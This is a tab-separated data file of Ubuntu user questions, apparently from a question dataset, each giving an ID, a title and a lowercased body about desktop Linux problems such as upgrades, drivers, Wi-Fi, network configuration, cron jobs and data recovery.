302750	about blank pages opening alone on chrome	since a few weeks , google chrome opens blank pages several times per minute , without any obvious reason . if i were using windows , i would think it comes from a virus , but that 's way less likely with ubuntu . so where do you think the problem comes from ? it also happens when i am not doing anything on the computer , including when chrome is n't open . thanks
302751	unable to commit using bazaar tool to my unfuddle svn	till now i was using `` rabbit vcs '' , but after changing my laptop somehow unable to install it properly . so , i have become a new user to `` bazaar '' which can be installed directly from `` ubuntu software center '' . checked out the code from unfuddle.com which worked perfectly fine . getting below error while performing my first commit using bazaar 's gui tool . python : /build/buildd/subversion-1.7.5/subversion/libsvn_subr/dirent_uri.c:1253 : svn_relpath_basename : assertion `relpath_is_canonical ( relpath ) ' failed . there is a bug raised on this at ubuntu launchpad . however could n't find any fix for that .
302753	upgrading fom 12.10 to 13.04	i 'm unable to upgrade to 13.04 . i 've tried the `` sudo do-release upgrade '' and the `` sudo release -d '' and i 'm still not getting any messages from my update manager saying that 13.04 is available .
302759	vaapi not working in ubuntu 13.04	i have a dell vostro 1014 having gma 4500 mhd . i have installed vaapi driver but it shows that it supports mpeg2 acceleration only . actually i want to use it for playing full hd video that takes 30-35 % cpu on playback while windows 7 using dxva keeps it around 4-8 % . when i run vainfo it shows : libva info : va-api version 0.33.0 libva info : va_getdrivername ( ) returns 0 libva info : trying to open /usr/lib/i386-linux-gnu/dri/i965_drv_video.so libva info : found init function __vadriverinit_0_33 libva info : va_opendriver ( ) returns 0 vainfo : va-api version : 0.33 ( libva 1.1.1 ) vainfo : driver version : intel i965 driver - 1.0.20 vainfo : supported profile and entrypoints vaprofilempeg2simple : vaentrypointvld vaprofilempeg2main : vaentrypointvld h264 is missing from the list .
302761	problem with ubuntu one in windows 8	i 've installed ubuntu one in windows 8 and after installation it prompted for login and i entered my credentials , but after clicking on finish , it shows me an error as shown below . so , what 's the problem ?
302762	how do i upgrade from 13.04 to 13.10 ?	i 'm trying to upgrade from 13.04 to 13.10 ?
302771	my firefox search hints are black on black , how to fix it ?	some update ( i think ) happened , and now google hints are unreadable . how do i fix this ? by the way , my ubuntu version is already unsupported and firefox version is 17.0.1 , but i ca n't update it yet , sorry . in the different profile everything ok , what the hell ...
302772	mobile partner does not run on ubuntu 12.04	i am using ubuntu 12.04 on a lenovo e430 laptop . for the next month i am going to stay in a flat with no internet connection , so i want to use huawei e173 modem to connect . ( and share the connection through wireless ) i downloaded the glorified mobile partner for linux . it seems to work for everyone . but for me , when i plug the modem in , nothing happens . ( the green light blinks and its contents are shown like a flash drive but that 's all. ) when i run the mobile partner from dash , nothing happens . when i run the file manually , nothing happens and when i `` run it in terminal '' , the terminal window immediately closes and nothing happens . and i have no idea what to do . lsusbs says : bus 003 device 007 : id 12d1:1c0b huawei technologies co. , ltd. update : the mobile partner that did not run was version 11.something and i installed 21.something - it does run , but it is in spanish and only for the provider movistar . so it is of no use for me .
302774	how to pass the image preview from the qml camera component to a c++ plugin	i 'm writing an ubuntu touch qml app that captures and processes images from a camera device . the processing is done by a c++ plugin to which i 'm passing the url of the image . i can successfully save images and load them from the c++ plugin , but i 'd rather not have to save the images on the filesystem first , and pass the in-memory camera preview to the plugin instead . given the url for the preview that i 'm getting from the camera ( image : //camera/preview_1 ) , i 'm guessing i should be able to get a reference to the `` camera '' image provider and then use the requestimage ( ) method to get the image . however , i 've not been able to figure out how to get hold of the camera image provider . here 's the code : qstring decoder : :decodeimageqml ( const qurl & imgurl ) { /* * @ imgurl : url to the camera preview . e.g . image : //camera/preview_1 */ qqmlengine * engine ; qquickimageprovider *imageprovider = 0 ; // fixme : this does not work , i 'm not sure how to get hold of // the image provider imageprovider = engine- > imageprovider ( `` camera '' ) ; qimage image = imageprovider- > requestimage ( ( `` preview_1 '' , & size , qsize ( ) ) ; return decoder : :decodeimage ( image ) ; } how do i get a reference to the camera image provider ?
302775	remove duplicate python	this morning i installed python3.3.2 from source , which is giving me some headaches , so now i want it removed . python3 launches python3.3.2 , which is stored in /usr/local/bin . however , when i try to remove it , it wants to remove python3.3.1 , stored in /usr/bin . i obviously want to keep this one . $ which -a python3 /usr/local/bin/python3 /usr/bin/python3 how do i get 'sudo apt-install remove python3 ' to not remove the necessary 3.3.1 /usr/bin one , and only 3.3.2 one in /local/bin ? thanks for any advice !
302777	wifi transfer of files from desktop to note 800	my desktop ( intel q2c processor ) is on ubuntu 12.04 64bit . connected to a wifi router through lan port . i bought a samsung galaxy note 800 . is there a way to wireless-transfer files from desktop to the note800 ? please help . i have recently upgraded my computer ( intel i5-4440 , and db85fl motherboard ) and ubuntu 13.10 , 64bit . now i have installed airdroid and found it working perfectly so far . thanks a lot for your help and support .
302780	failed partition	i have a computer with 5 years . and my os stopped working so i was trying to install ubuntu 13.04 in it . everything was working until in the installation window it popped up a window saying `` failed to create swap partition 5 '' . what can i do to solve this ?
302784	enable wireless option is disabled in network settings in ubuntu 12.04	my wireless connections have regularly disconnected with the wireless option disabled in network settings . this problem occurs frequently . after restarting , i can access . but again an error comes after some time ( there is no fixed interval ) . please suggest what to do . below is the description . there is only one switch to enable/disable bluetooth and wifi . $ rfkill list all 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : yes 25 : hci0 : bluetooth soft blocked : no hard blocked : no
302785	how to change the orange theme to something else ?	with ubuntu , you have the orange like theme that shows when you highlight something or click on something . that colour orange is very tacky . how can i change that colour to a colour like blue or make that colour translucent or even transparent .
302788	gui does not start on boot	ubuntu 12.04 does not start x after boot up . worked until now without any problem , and last shutdown was clean . after text log in i can run startx , but no tray and alt+tab does not working . command startx run my default gnome classic and gnome statup scripts also runs . how to restore to start x automatically ?
302798	glassfish before tomcat	i have used this to install tomcat http : //diegobenna.blogspot.com/2011/01/install-tomcat-7-in-ubuntu-1010.html and this to install http : //www.silvatechsolutions.com/tech-tips/glassfish-ubuntu-12-04-ubber-quick-install-guide/ i know about update-rc.d command for priority boot from here http : //www.pathbreak.com/blog/ubuntu-startup-init-scripts-runlevels-upstart-jobs-explained and here http : //www.debuntu.org/how-to-managing-services-with-update-rc-d/ here are my planed boot up other bootup processes ... . mysql server apache server glassfish tomcat user login aka gnome or ubuntu unity here is the problem when i run sudo find /etc/rc* -iname `` mysql '' no result sudo find /etc/rc* -iname `` gnome '' no result sudo find /etc/rc* -iname `` unity '' no result sudo find /etc/rc* -iname `` apache '' /etc/rc0.d/k09apache2 /etc/rc1.d/k09apache2 /etc/rc2.d/s91apache2 /etc/rc3.d/s91apache2 /etc/rc4.d/s91apache2 /etc/rc5.d/s91apache2 /etc/rc6.d/k09apache2 sudo find /etc/rc* -iname `` tomcat '' /etc/rc0.d/k85tomcat /etc/rc1.d/k85tomcat /etc/rc2.d/s25tomcat /etc/rc3.d/s25tomcat /etc/rc4.d/s25tomcat /etc/rc5.d/s25tomcat /etc/rc6.d/k85tomcat sudo find /etc/rc* -iname `` glassfish '' /etc/rc0.d/k84glassfish /etc/rc1.d/k84glassfish /etc/rc2.d/s26glassfish /etc/rc3.d/s26glassfish /etc/rc4.d/s26glassfish /etc/rc5.d/s26glassfish /etc/rc6.d/k84glassfish right now its happening tomcat and glassfish start after i login which takes few minutes to load not allowing me normal work on pc wish to fix that
302800	wine glitch or lubuntu 13.04 ?	ok , i 've been using wine to try to run windows programs ( duh ) well i was recently trying to run everquest . which winehq gave a gold . it runs just fine for what i would expect for my system . but heres the rub . after playing for maybe 5-15 minutes it freezes i ctl+alt+delete and it says that eq.exe is using over 16,000,000 tb of memory ... what i need to know is , is this a glitch with wine or lubuntu ? also , help sorting out this mess would be appreciated . here is a pic of my task manager before i kill the process .
302801	ubuntu 13.04 not working	ok , so i ubuntu dual boot with my previous win 7 and the latest ubuntu 13.04 . at first in the installation time , the install got frozen . so i restarted my pc and then installed it again , and it worked this time . after logging in , when i tried to launch software updater , it got frozen again , and then nothing showed up . after a minute or so , it gave me an error : sorry , unexpected internal error . please help , i 'm just beginning to use linux , so i do n't know anything .
302806	lost desktop in ubuntu 13.04	i have ubuntu 13.04 installed alongside win 7 in a 10gb recovery partition that has been fine . i did n't like unity , so was using gnome desktop , no problems . today i noticed disc space on ubuntu was low , so removed unwanted programs , including cairo dock . now when i log in , i get a notice that gnome desktop is not found ( gulp ) ... only option is log out i can log in as guest and pull up a terminal , but not in sudo ( i have a sudo user and password . any ideas out there please ?
302810	what audio players can use winamp skins ?	my favorite player is deadbeef - but i am curious whether i can use winamp skins in a player for ubuntu .
302812	13.04 black screen when waking up from suspend	i just installed ubuntu 13.04 on my lenovo g580 . when running pm-suspend or closing the lid , the laptop suspends just fine . however when i re-open the lid or press a button , it wakes up ( fans start running ) , the screen remains all black ( no mouse pointer or anything ) and i am forced to reboot . sometimes i can hear a sound that i think is the ubuntu login prompt , suggesting that the laptop is running and that the problem is with the monitor . i have no full-screen applications or external devices plugged in at the time of suspend . how can i diagnose and fix this problem ? here is a copy of my /var/log/syslog after a reboot after a failed suspend-wakeup : https : //gist.github.com/anonymous/5690306
302817	pptpd not starting	i am working on ubuntu 11.10 . i am getting a error message while starting pptp vpn server : pptpd [ 6779 ] : mgr : could n't create host socket pptpd [ 6779 ] : createhostsocket : address already in use
302824	can i install ubuntu mobile os in my samsung galaxy grand ( android ) ?	i want to use ubuntu in my smart phone , as i was a huge fan of it . so , is there any possibility to install ubuntu os in android mobiles ? thanks , sairam
302825	need hdd access from live cd	something went wrong with the kernels of my current installed ubuntu , and because of this i ca n't access my ubuntu installation , so i 'm trying to make a back-up using a livecd and copying everything to my hard drive . the issue is that i ca n't get access to the file system . i can view the files but i ca n't copy anything . i tried a few commands to fix this but so far all failed . i tried the chown command , but this always returns the error permission denied i also tried gksudo nautilus to open a full permission folder but i did n't get any access here too ... anyone any suggestions ? ? thanks in advance .
302827	is it possible to install ubuntu on a chromebook ?	is it possible to install ubuntu on a chromebook ? if so , what are the minimum system requirements ? will ubuntu preform as well on the chromebook as on a windows laptop ?
302831	how to flush cups spool	my printer is blocking ; there is no relevant message in the error log , but the printer dialog says : `` /var/spool/cups/d00359-001 ( object 89 0 , file position 957134 ) : expected endobj '' i deleted that file but that did n't change anything . this happened after trying to print a latex-generated pdf ( 3.5mb )
302833	when to remove the pendrive after installing ubuntu ?	i do n't exactly know when to remove the usb used for installing ubuntu . if i do n't remove it even when the option 'restart now ' comes after installation , i go to the same option of try ubuntu , install ubuntu ... if i try removing it before clicking restart now , i get a screen with error message .
302834	do i need nvidia driver on my new dell 5720 with ubuntu 13.04 ?	just got new dell inspiron 5720 . as i know there are two video cards - intel and nvidia . and as i see in system information , i use intel ivy bridge . but how about nvidia ? i know about bumblebee and also know about new nvidia 319 driver which must support optimus . can anybody suggest which driver to use ?
302836	for more security : overwrite empty disk space	i know it might seem a stupid question but i have n't come across any forum or post on the internet about : - what does `` overwriting an empty disk space '' mean/do ? - why doing that makes it more secure when encrypting a disk ? thanks in advance .
302840	why is /etc/network/interfaces ignored ?	i 've been searching the internet for the last 2 hours and ca n't seem to find a solution to the following problem . i just installed xen in a fresh xubuntu 13.04 and in order to setup the networking , i had to remove network_manager . so , all network configuration is done through /etc/network/interfaces . at least , that 's what should happen . however , it seems what i put in there is just being ignored : my xenbr0 interface does n't get an ipv4 address assigned , there 's no default gateway and no nameserver is setup . here 's what 's in the /etc/network/interfaces file : auto lo iface lo inet loopback # there are no ip configurations for eth0 , itâs all defined under xenbr0 : # auto eth0 # static configuration auto xenbr0 iface xenbr0 inet static bridge_ports eth0 address 192.168.1.200 # the ip address of the ethernet port broadcast 192.168.1.255 netmask 255.255.255.0 gateway 192.168.1.1 # the address of the router bridge_stp off # disable spanning tree protocol - optional bridge_waitport 0 # no delay before a port becomes available - optional , comment out if this gives you troubles bridge_fd 0 # no forwarding delay - optional dns-nameservers 192.168.1.1 in order to fix my network connection , i run a small `` fix '' script : # ! /bin/bash ifconfig xenbr0 192.168.1.200 netmask 255.255.255.0 up route add default gw 192.168.1.1 xenbr0 i would like to fix at the core though . right now booting takes at least 1 minute extra , because the system waits for a working network connection . edit : i also had to add the following to /etc/resolvconf/resolv.conf.d/base and run sudo resolvconf -u : nameserver 192.168.1.1 without this i can only ping ip addresses , no dns requests get passed through . this is actually what convinced me that the interfaces file is completely ignored . edit 2 : doing either sudo restart networking or sudo /etc/init.d/networking restart does n't do anything . edit 3 : some extra info . here is what ifconfig output should look like ( working network/internet connection ) : eth0 link encap : ethernet hwaddr 00:1c : c0:77:09:9d up broadcast running multicast mtu:1500 metric:1 rx packets:3346 errors:0 dropped:0 overruns:0 frame:0 tx packets:2903 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2931429 ( 2.9 mb ) tx bytes:661616 ( 661.6 kb ) interrupt:20 memory : e3200000-e3220000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 frame:0 tx packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1720 ( 1.7 kb ) tx bytes:1720 ( 1.7 kb ) xenbr0 link encap : ethernet hwaddr 00:1c : c0:77:09:9d inet addr:192.168.1.200 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :21c : c0ff : fe77:99d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3329 errors:0 dropped:0 overruns:0 frame:0 tx packets:2875 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2870029 ( 2.8 mb ) tx bytes:647394 ( 647.3 kb ) here is what it looks like right after boot . the only thing missing is the xenbr0 ipv4 address ( and the routing/dns data , but you ca n't see that in ifconfig 's output ) : eth0 link encap : ethernet hwaddr 00:1c : c0:77:09:9d up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0 b ) tx bytes:0 ( 0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 frame:0 tx packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0 b ) tx bytes:0 ( 0 b ) xenbr0 link encap : ethernet hwaddr 00:1c : c0:77:09:9d inet6 addr : fe80 : :21c : c0ff : fe77:99d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0 b ) tx bytes:0 ( 0 b )
302841	installing updated bios for dell 530s , keep getting `` insufficient memory '' error ?	i have tried using both virtual and real freedos disks to load the file , but i ca n't get it to work- i run only ubuntu 12.04 and i 'm looking to upgrade my cpu , but every time i try to run the 530_1018.exe file on my freedos flash disk , it expands it , says `` insufficient memory '' once it gets to the award bios flasher , and deletes the expanded file . any suggestions would be very helpful- thank you ! p.s.-i am planning on adding 2 additional gb of ram , so if that will solve the problem , i do n't mind waiting until that comes . edit : i opened it up , looks like a foxconn g33m02 motherboard .
302842	ca n't change / configure system settings	i just performed a fresh install of ubuntu 12.04.2 lts without any issues . i updated the software , i installed the recommended proprietary drivers , installed any additional software that i wanted with no problems . however , i ca n't seem to change any system settings , they do n't stick . i can access system settings , i can click on each option , but when i select an option to change it does n't take . for example if i click on time and date settings and place a checkmark beside show weekday and date and month . it will place a checkmark beside those options but wo n't actually change in the menu . when i press the `` x '' to close out and go back into settings it 's back to the default and the options i checked are unchecked . also happens with wallpaper , i can see all my wallpaper , but i select another wallpaper other than the default and it wo n't change . i turn on auto hide launcher and it does n't auto hide . i change my shortcuts on the unity bar and when i restart my computer the settings do n't stick they go back to the defaults . any idea what i can do to fix this or why it is happening . other than that everything is working . edit , when i log out of my user account and into a guest session , i am able to adjust all system settings without issue . thanks
302844	how do i setup two cron jobs to run every night at 3:00 and 3:10 ?	i have an ubuntu home server running virtual box . i have virtual server running on that box that i am having problems with . for now i do n't have time to troubleshoot the actual issue but i have found that restarting the server fixes the issue for at least 24 hours . so my quick fix is to restart the server each night . bottom line is that i want to run the following command at 3:00 am 7 days a week . vboxmanage controlvm virtualpbx acpipowerbutton at 3:05 each night i want to run the following command . vboxmanage startvm virtualpbx -type headless the best answer will give me step-by-step instructions for getting this done from launching the console to closing the console . i want to learn more of cron and the linux infrastructure but for now i do n't have the time . thanks so much for your help . seth b spearman ** edit ** i want to be able to put these in place from an ssh prompt . ( do n't laugh but the server does n't have a monitor hooked up right now and it would take a fair amount of work to get it working. ) . but i can ssh to it at any time . from the ssh prompt crontab does not seem to work ... it just goes to the next line and seems to be waiting for more input . i tried to install crontab from ssh using sudo apt-get install crontab but it ca n't find it in any repository . so i think i will use nano and do it manually but i need to know where to put it . all that to say ... i am doing this from an ssh prompt ... which i think does n't matter but thought i would let you know . seth
302853	is there any nice tool to read .cap files and reassemble packets ?	i have some difficulty to run xplico . is there any other similar tool to read and reasseble packets ? ( because wireshark gives some non-really-readable appearance for these files )
302860	why screen becames darker when i use 2 monitors ?	i have xubuntu 12.10 and when i try to set 2 monitors if i expand the screen instead of mirroring it , the 2 screens become darker . i do n't really know how to explain so i took a print-screen .
302862	ubuntu 13.04 crash after a while ( black screen )	i have an inspiron 7520 . i got an amd radeon hd 7730m 2go with a intel hd 4000 running on open source driver updated from x-edgers repository . i got also a i7 2.4ghz overclocking to 3.1ghz . the problem i experience today is that when i leave my computer untouched , my screen goes black ( as expected ) but i ca n't wake him up . the screen remains black . the thing that tells me that the computer crashes is that my wireless card crashed . i have lost the connection between this computer and another one , transfering data from ssh
302866	what decides an ubuntu version to be lts or non-lts ?	i was wondering which factors decide an ubuntu version to be lts or non-lts ?
302876	change steam tray icon back to default	i have used this blog article http : //www.webupd8.org/2013/02/get-ubuntu-mono-icons-for-steam-ubuntu.html to change the default tray steam icon to the one used in the article for ubuntu-mono-dark . now i cant seem to change back to the default icon . the icon which is used for ubuntu-mono-dark clashes with my new theme , where i cant seem to see the steam icon very well .
302880	ubuntu 13.04 clean install pandora does not work	simply put pandora is not working this is the error they give me , `` we 've encountered an error . sorry , it 's our fault . please click 'reload ' to continue listening . '' of course i hit reload and it does not work . more info ... everything was working fine running 12.04 then i did a system upgrade to 13.04 once the upgrade was complete pandora among other this did not work . then i went the extra step and backed up all files on an external hard-drive and did a format and a clean install , still the problem persists . any ideas or help would be great . ... i am running chromium w/ ad blocked and hover zoom . i also just tried groveshark.com and this music playing website works with no issues . thank you pow
302884	ubuntu 12.10 wont mount an external harddrive	i have 2 external 1tb harddrives , both of which normally get mounted on startup . for the past couple of days , one of these drives has not been mounted . i have tried unplugged and plugging the non-mounted one , aswell as restarting the system . but this has not fixed the problem . is there anyway of forcing ubuntu to mount anything plugged into the pc , or anything similar ? thanks in advance .
302887	texmaths extension not working in writer libreoffice	in my linux distro called mageia 2 , i 've installed texmaths-0.38.oxt from tools > extension manager in writer ( libreoffice suite ) but when i go to use it , it asks that i indicate a certain `` path '' for latex . i do n't have any latex packages installed in mageia however latex path is mandatory while dvipng and dvisvgm are optional . can you help me fix this problem ? do i have to install an additional extension called latex and type its path in the box ? i installed texmaths extension in windows7 - libreoffice as well as miktex and did n't experience any problem with it . in mageia2 ( a kde distro ) , texmaths extension is not working .
302889	middle button in logitech t620 mouse	i have bought a logitech touch mouse t620 . it works ok , but the middle button does n't work..any idea ? is it working for you ? i 'm on ubuntu 12.10
302890	lubuntu 12.04 laptop fails installation if done with livecd	we created livecd on lubuntu 12.04. the following errors are observed : when iso is run on laptop with install option it gives an error as `` installation encountered an unrecoverable error . a desktop session will now be run so that you may investigate the problem or try installation again . '' when machine goes into try ubuntu mode the install option link does not work at all . it is also observed that same iso when tried on desktops the mouse does not work at all . can someone help to sort out these two issues on livecd which is compiled using uck . pl . suggest the solution so that changes can be incorporated on livecd .
302891	firefox profile can not be loaded after upgrade	i upgraded from 11.10 to 12.04 , now when i try to run firefox from the icon it pops up this : `` missing profile . your firefox profile can not be loaded . it may be missed or inaccessible . '' i already tried to remove firefox and re-installing it . and the command `` sudo chown -r $ user : $ user ~/.mozilla '' . i 've also tried to delete the profile file , or renaming it . i 've found some solved problems but they did n't work for me . maybe i should mention that if i run firefox from terminal using `` sudo '' it starts fine . any idea about how could i solve this ?
302893	i added a second harddrive and now i am trying to format the first one and i am having an issue	i just added a second faster hard-drive and it is working great ! however i am having an issue formatting the original hard-drive ( i already have everything backed up ) . after going to the disk app and selecting the correct hard-drive i click on format . after about 10 seconds or so i receive this error '' error formatting disk . error synchronizing after initial wipe : timed out waiting for object ( udisks-error-quark , 0 ) '' any ideas on how to either fix this issue or simply format my older hard-drive ?
302897	create bootable usb stick via terminal	besides creating bootable usb stick via startup disk creator and it always error , alternativelty , how to create bootable usb stick via terminal ?
302898	why does n't ld_library_path has any effect ?	./a.out : error while loading shared libraries : libc++.so.1 : can not open shared object file : no such file or directory even though : $ echo $ ld_library_path /home/exe/libcxx/lib : /home/exe/llvm/lib : /usr/local/lib $ ls /usr/local/lib libc++.so libc++.so.1 libc++.so.1.0 python2.7 python3.2 i even copied it next to the executable , still no effect . what am i doing wrong ?
302902	13.04 doesnt remember wired network password	i recently updated to 13.04 version of ubuntu ( kinda disapointing ) and every time i boot ubuntu , i have to login to my school network , even though system should remember password ( dont save password option is unchecked ) , it remebered in previous versions of ubuntu with no problem and there was no change in network itself . its kinda annoying , because i switch ubuntu and win8 several times a day , does anyone encountered same problem/found a solution ? i cant help it , but nothing works in this issue .
302903	ubuntu 13.04 64bit - wi-fi not detecting any networks	first off , i am new to linux/ubuntu , and i barely know anything about it . i know this was answered on the web many times , but i tried all i could find , and nothing worked . there is no way i could access internet inside ubuntu , as wi-fi is my only source of connection . i am dual-booting it on a macbook pro retina ( mid 2012 ) , if that 's any useful information ... another thing is that when i open system settings > software & updates , and enable `` cdrom with ubuntu 13.04 'raring ringtail ' '' , and open the additional drivers tab , i see `` broadcom corporation : bcm4331 802.11a/b/g/n '' , and below it says `` this device is not working. '' . if i enable it , it just reverts back to `` do not use this device '' . i have also tried the n43 solution , and a whole bunch of terminal commands that i found on the web , to get it working . i had no luck so far . i 'll put additional information if i need to . thank you for your time .
302909	output system processes via ps	i need to output system processes via ps . as far as i know , flag f ( first column ) is responsible for this : 1 means that this is system process . how can i output only these processes without others ? 'ps -el ' example :
302914	find and replace text in multiple files using geany	i 'm looking for a method to find and replace text in hundreds of files . i know that geany can find text in multiple files . that 's good . but how to replace the text ? geany seems to do it only in the file that 's currently opened . how do you open all files in geany where it finds the search string . thanks
302919	league of legends on playonlinux	here it says lol is supported : http : //www.playonlinux.com/en/supported_apps-1-0.html but it is not on the list in the program : http : //s7.directupload.net/file/d/3273/58q7tx88_png.htm what is the problem ?
302930	install all xorg-edgers updates ?	i 'm currently using ubuntu 13.04 and recently got a nvidia gpu . i 've found that the easiest way for me to install the driver is to use the xorg-edgers ppa and it works really well . however , i also get another bunch of updates from them including touchpad drivers , amd drivers , nouveau updates and some stuff i 've not even heard of like buffer management and cirrus . is it safe to install these updates ? especially after installing the nvidia driver ? i dont wana mess anything up . if its not safe , is there a way to hide the updates ? thank you : )
302933	how to disable openvpn from autostarting at boot-up or reboot ?	i am using ubuntu 12.04.2 lts , 64-bit , openvpn client 2.3.1 how do i prevent openvpn from autostarting at boot-up or reboot ?
302935	how to save touchpad pointer speed settings on ubuntu 13.04 ?	going to all settings - > mouse & touchpad , i try to set the `` pointer speed '' at `` touchpad '' options . that settings works fine at that screen and i can test the touchpad with the new settings , also i can use other screens as well . but , if i close the settings window the `` pointer speed '' settings is reseted to default . how to save that settings ?
302936	window screenshot with unity global menu enabled	when i press alt+prtsc , it only shoots when i release alt , so it gets a screenshot of the global menu . how do i get the screenshot of the window without disabling global menu ?
302939	gnome shell 13.04 wo n't login	i am running 13.04 gnome version with 3.8 . all was running fine until today when i tried to install the intel graphics driver installer . i also made a tweak because of issues with citrix icaclient . i definitely broke something here . when i start the machine i do get a login ; however , it is showing the default gnome login wallpaper and everything is very large . if i put my login credentials i get to a desktop with the default gnome wallpaper but nothing else . the cursor shows as a large x. i can ssh into the machine and removed the citrix client , and also the intel drivers that i installed . i rebooted , but no go . no desktop . i have also run : sudo apt-get dist-upgrade what 's best next step here ?
302940	set limit to data transfer/copy speed	on command-line and/or file managers ( such as nautilus ) , how do we set an upper limit to data transfer/copy speed ? i have n't found anything on the manuals of `` cp '' or `` mv '' . i wa n't to know this since i 'm having problems putting files in a microsd cards of class 4 . transfering small amounts is fine , but when i put up a large queue of files ( like 100 files totalling 10gb ) , things go bad . there comes an `` input/output error '' and then onwards the sd card locks and i can not delete or do anything with it . setting a transfer speed would probably fix it .
302945	executing binary does not work and does not return anything , although expected	i have downloaded biber from here : http : //sourceforge.net/projects/biblatex-biber/files/biblatex-biber/1.6/binaries/linux/ neither the 64bit nor the 32bit executables work for me : after downloading and extracting the archive running : ./biber -- help does not output anything ( it returns me to bash ) . i have also installed texlive 2013 pretesting and there the biber compiler does not work either ( same symptoms : nothing happens at all ) . : ( . has anybody an idea what to do ? i have tested various versions of biber offered to download on sourceforge but did not get any of them working . i would be very happy if you could help me : ) i am running on ubuntu 13.04 .
302948	ca n't connect to networks , wireless or etho , after installing ubuntu 12.10 on vostro 1500	i am a very inexperienced linux user and do n't really know what i 'm doing . i recently updated to ubuntu 12.10 with a live disk on my vostro 1500 laptop . the network was not connected when i updated to the newer operating system . now my desktop can connect to any network . i tried using my eithernet cable to go and download a chunk of missing firmware , but my computer wo n't connect to the eithernet either . what do i do here ? basic advice would be much appriciated as i am not well acquainted with using terminal . thanks a bunch !
302951	update-initramfs : /usr/share/initramfs-tools/hooks/fixrtc failed with return 1	i 'm using kubuntu 13.04 x64 . i found out about this problem after installing nvidia drivers from jockey and seeing that nouveau was still loading instead . i tried to manually reinstalling nvidia-current but initramfs-update fails : $ update-initramfs : generating /boot/initrd.img-3.8.0-23-generic e : /usr/share/initramfs-tools/hooks/fixrtc failed with return 1. update-initramfs : failed for /boot/initrd.img-3.8.0-23-generic with 1 . this errors started after trying to install nvidia drivers , but it most probably is unrelated . as i understand from fixrtc , it 's just trying to set the correct time using time , dumpe2fs and hwclock . can you tell me what 's happening ? i ca n't build initrd images with initramfs-tools failing on the fixrtc hook .
302953	recover data in external harddisk ( which still shows 1.2/2tb as used ) accidentally erased using startup disk creator	i accidentally erased a 2 tb harddisk while trying to create ubuntu startup disk on my 2gb pendrive . instead of erasing the 2 gb pendrive i think i erased the 2tb external hardisk using the startup disk creator . it took only less than 5 seconds for the startup disk creator to erase my 2tb external harddisk . also when i open the affected external 2tb drive there are no files visible , but the properties of the disk shows 1.2tb of the space as used ( same as the size of the data i had stored in it previously before accident ) . please see this image . so i believe that the original data is somewhere in broken/invisible formats inside the disk . that is my only hope . i do n't have a alternate 2tb harddisk to take a backup or to perform testing . i can neither avail or afford one right now in my place . so i do n't want to mess up further by choosing a wrong recovery method on the original affected disk . my clients would be mad to listen to these stories for delays in my current deliverable , but getting fired or loosing business is the least of my problems now . this external hardisk is more important and is everything i had in my life and career . to recover the data , i have already gathered ideas about testdisk and photorec from this posting and several others in google . i did n't try any of them on the affected hard disk . but i did try both testdisk and photorec on other portable devices for testing purpose . for instance , i tested them on a pendrive and retrieved files like a broken pieces from postmortem . it will be of no use , if that is what the recovery tools can provide it will be too impossible for me to rearrange , rename and understand the data/files of total size which is around 1.5 tb . the data involves most possible formats of images , sounds , videos , scripts , programs , codes , design files etc.. is n't there a way to just undo this accident ( that took only 5 seconds ) and get back all my files as it is ? because the properties of the external drive still shows 1.2 tb as used and only 800 gb out of 2 tb as free . i would loose 10 years of my life 's work , designs , programs , all critical files , projects and priceless family memories . i am a living dead if i ca n't get back my data . most of the post with similar issues are dated 2012 or before , so i believe there should have been some technology improvements to undo this by now . i know i am foolish to have something that i considered worth more than my life in one single external hard disk . but it had been that way ever since i started computing and i never faced any single issue so far . i was using windows and only recently i switched to ubuntu . and i made this mess while using ubuntu 's in-built startup disk creator . infact the hard-disk was only my backup and i used to have the working copies in my laptop . but my bad time , i had also crashed my laptop recently while i was trying to render an animation using blender and this week i lost the main backup data in hard-disk too . i can never recover from this tragedy and i request that if anyone knows a solution to recover data and files from the 2tb hard-disk data , please share me . please help ! should i run testdisk or photorec on my external hard disk ? can it restore all the files as it is ? or do we have any other solution to resolve this , as my hard-disk is not totally empty and it 's properties shows 1.2tb as used space ? regards , k
302957	unable to install ubuntu 13.04 on a system pre-installed with windows8	i made my usb `` liveusb '' using `` linux live usb creator '' with source as `` ubuntu 13.04.iso file '' and also i changed my `` uefi fimware settings '' as it was there in installation guide for ubuntu 13.04.but when i try booting using my usb it 's again booting into windows8 , i 'm unable to understand why ? , here in my case i 'm unable to even see ubuntu live image screen rather seeing a blackscreen with underscroll at the top for sometime and then my system 's booting into windows8 . my system is `` asus s56c ultrabook '' with intelx86 processor and also pre-installed with windows8 .
302958	bazaar will not allow launchpad login	i am trying to set-up a working environment for application development on my lubuntu 12.04 system using this guide . but upon entering the command bzr launchpad-login mylaunchpadid , i am given an error message : warning : gnome-keyring : : could n't connect to : /tmp/keyring-upnhjy/pkcs11 : no such file or directory how can i fix this ? thanks in advance .
